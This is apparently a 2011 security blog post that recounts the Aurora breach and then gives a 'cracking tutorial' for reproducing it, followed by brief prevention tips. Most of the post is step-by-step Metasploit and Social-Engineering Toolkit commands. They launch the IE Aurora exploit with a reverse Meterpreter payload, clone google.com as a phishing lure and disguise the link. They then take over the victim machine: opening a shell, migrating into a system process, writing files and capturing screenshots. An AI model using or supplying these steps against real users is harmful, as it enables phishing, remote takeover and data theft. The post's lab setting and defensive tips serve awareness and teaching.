Thursday, January 20, 2011

Social Engineering, Phishing Tutorial and Prevention Tips - Part 2

Finally getting to Part 2 of the Social Engineering Attacks and Prevention Tips. The last couple of months been hectic with school and work. Although, I am happy and feel fortunate to have experienced working in the field of information security. I completed my internship last month. However, I noticed within this short period of time, the ease of attacks and creation of exploits have increased dramatically. To mention a couple, David Kennedy (Rel1k) has improved the ease of attack with his Social-Engineering Toolkit (SET) and there has been great hype around Armitage created by Raphael Mudge. Unfortunately, I have not used the updated SET and the release of Armitage. I was planning on presenting more parts for this series but I will complete it with this post. I might insert some posts in the future but with the rapid pace of this field, I plan on catching up on the new exploits and tools that are being released.

For this post, I will present the infamous Aurora hack. In fact, this hack is what initially sparked my interest in information security. Over the following of months, I read the investigation of the hack and was completely mesmerized and astonished with the sophistication and the initial ease to gain access to the information. The highly publicized attack was discovered in January 2010 by Google and it was later revealed that 34 other U.S. companies was hacked in the same fashion. The main point of the Aurora hack was to steal intellectual property from these organization and the origination of the attack was from an employee who clicked on a malicious link sent by instant message. A simple mistake caused devastating damages. This is the intended reason for companies blocking certain website or banning the use of certain programs. With this type of attack, the user does not even know the click of the link just caused the attacker to own their machine. Subsequently, it is just a matter of time for the attacker to map the network and grab the wanted information while being obscure. In this case, the user clicked on the link which opened the website in Internet Explorer and exploited an unknown vulnerability at the time. In turn, a malicious software was immediately downloaded to the user's computer to gain access at anytime.


Now to illustrate how this vulnerability was exploited, what you can do to decrease your chances of being attacked, and increase your awareness of malicious links and websites. I will demonstrate the attack through two different tools: Metasploit and SET.


Cracking Tutorial


Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools.  We will be using the Metasploit Framework and Social Engineering Toolkit.  These tools are included with Backtrack distribution.
    •  This link provides detailed instructions on multiple ways to run Backtrack on your computer.
      2. I will be conducting this demonstration solely with VirtualBox.  The virtual computers will be consisting of Windows XP computer and a BackTrack 4 Linux Distro.

      3. You can click on the images to view at a larger scale.  All links open in a new window.



      Steps:


      1. Boot up Backtrack.  The login is "root" and the password is "toor."  Do not include quotes or the period at the end of toor.  Type "startx" at the next prompt.

      2. Open up a Konsole window.  It is the 3rd icon from the bottom right.

      3. Type /etc/init.d/networking start press enter.  This will get our IP address that we will need later in this tutorial.

      4. Type clear press enter to clear the screen.

      5. Type cd /pentest/exploits/framework3 and press enter to reach the Metasploit directory.

      6. Type ./msfconsole to enter the framework.

      7. Type use windows/browser/ms10_002_aurora


      8. Type show options to view what are the required settings.


      9. Now, set the payload - this carries out the exploit. 
      • Type set PAYLOAD windows/meterpreter/reverse_tcp
      10. Enter the required settings.
      • Type set SRVHOST 192.168.75.140 - this is the local host IP (the attacker's machine).  You can view this command line in the second image.  I accidently type LHOST on the first image.
      • Type set SRVPORT 80 - Port 80 is used for Internet browsers
      • Type set URIPATH / - this is the web address to the malicious website.  In this case, it will be http://192.168.75.140/


      11. Type exploit


      12. Now, your computer is a server listening on port 80 waiting for a victim to visit the website, http://192.168.75.140.  With simple HTML coding, this address can be hidden with an official website address.

      13. Open Internet Explorer and type in the web address.  In the following image, it directs the user to a blank page but the malware has been downloaded.



      14. The attacker will be able to know when the victim visits the website when a session is opened directly to the victim's machine.


      15. Type sessions to view the type of machine, user info, and IP address.


      16. Type sessions -i 1 to connect to the victim's machine.


      17. The following images displays different information you can view about the victim's machine.  You can type '?' to view other commands that will work with this session.

      Displaying the system information

      Entering the command 'ps' for a list of running process

      Result of the running process

      Migrating to a different process to make sure the session does not close.  For example, the attacker received control of the victim's machine through IE. If the victim closes IE, the session closes. It's good to migrate to a system process that needs to run while the computer is on.

      Prevention Tips:

      1. Never click on a link sent by e-mail or instant message if you do not know the sender.

      2. If you are familiar with the sender but suspicious of the message, you can go to Email Trace and paste the e-mail header to find out information on the sender.  For example, in Gmail click the down arrow next to the reply button and select 'show original.'  Copy the text document and paste it in the website.

      3. Do not click on links with outrageous messages; especially, if you have to reenter your login credentials.

      4. Install the Firefox Add-on, Search Engine Security. You can view more information about this add-on at New Firefox add-on to protect against Blackhat spam SEO.

      5. Download McAfee Site Advisor.

      6. Make sure to update/patch your software.  There are automated software that will check for available patches called Secunia PSI and FileHippo.  During this situation, Google placed the blame solely on Microsoft because it was an Internet Explorer vulnerability that caused the hack.  Although, I place a huge blame on Google's part because they were using Internet Explorer 6 on Windows XP machines'.  For years, Microsoft been telling the public to upgrade IE 6 to version 8 because of its vulnerabilities; especially if you are using Windows XP.  You can read my post on the Importance of Patches for more information.

      New on Security 4 Information:

      From now on, I will be demonstrating cracking techniques on video.  Below is my first video demonstrating the Aurora hack with Social Engineering Toolkit (SET).  You can also view the video on Vimeo at http://www.vimeo.com/19016634.  Along with the video, I will post the written command lines.


      Social Engineering, Phishing Tutorial and Prevention Tips - Part 2 from Surapheal Belay on Vimeo.

      • Select '2' for 'Website Attack Vectors
      • Select '2' for 'Clone and setup a fake website'
      • Select '2' for 'The Metasploit Browser Exploit Method'
      • Enter a website to clone: http://www.google.com
      • Select '1' for 'Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
      • Select '2' to create a Meterpreter session to allow access to the victim computer
      • Wait for the victim to go to the malicious website
      • In BT4 Konsole, enter sessions -i 1
      • Type shell
      • Type exit to get back to the meterpreter session
      • Type ps to view list of running process
      • Type migrate 992. I chose svchost.exe with system credentials. Your process ID will be different.
      • Type shell to get a command prompt of the victim machine
      • Type hostname to view the name of the computer
      • Type cd .. until you hit the C:\>
      • Type cd "Documents and Settings"
      • Type cd "All Users"
      • Type cd "Desktop"
      • Now, I have direct access to the XP desktop. To demonstrate ownership, I will create a .txt file named hacked.
      • Type echo hacked > hacked.txt
      • When I do this, you will see the text document automatically created on the desktop.
      • Type exit to get back to the meterpreter session
      • Type ? to view all the commands you can enter with a meterpreter session
      • Type screenshot to view the current screenshot of the victim's machine. Wait a couple of seconds and it will open in Firefox or you can go to the directory where the image is stored.
      This a simple demonstration of gaining ownership of a remote machine.  The Mestasploit Framework is much more powerful and different exploits are being added frequently.

      Recent News